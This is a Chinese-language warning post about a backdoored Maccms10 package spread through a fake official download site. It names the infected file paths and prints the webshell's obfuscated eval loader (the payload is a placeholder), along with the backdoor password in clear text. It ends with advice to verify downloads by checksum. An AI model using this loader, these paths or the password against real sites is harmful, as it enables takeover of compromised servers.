該文章僅供學習,利用方法來自網絡文章,僅供參考
Maccms10基於php+mysql的maccms,是蘋果的內容管理,方便使用,功能良好,適用范圍廣
后門網站下載網址,是假官網:http://www.maccmsv10.com/download.html ,下載的maccms10版本的cms是個有后門的maccms10
后門所在路徑
maccms10\extend\Qcloud\Sms\Sms.php
maccms10\extend\upyun\src\Upyun\Api\Format.php
惡意代碼,是個大馬
<?php
error_reporting(E_ERROR); //提示一個誤導人的報錯
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M'); //ini_set初始化環境
header("content-Type: text/html; charset=utf-8");
$password = "0d41c75e2ab34a3740834cdd7e066d90";//MD5加密的,解密密碼為WorldFilledWithLove
function s(){
$str = "編碼之后的惡意代碼";
$str = str_rot13($str); //對惡意代碼進行rot13編碼
m($str); //用m函數處理
}
function m($str){
global $password; //密碼全局變量
$jj = '';
eval($jj.pack('H*',$str).$jj);//pack('H*',$str)對混淆的php進行解碼,解碼之后的代碼經過eval函數處理解析,eval() 函數把字符串按照 PHP 代碼來計算。
}
s(); //調用函數
?>
植入后門的網站利用非常簡單,直接訪問就行,進入之后因為是大馬可以為所欲為,請看到本文章的網友,如果有下載錯的,盡快處理及時止損,廣大網友下載軟件,程序時候一定要在官網下載,最好養成下載程序之后,使用官網提供的校驗值進行校驗,比如利用HashTab來進行校驗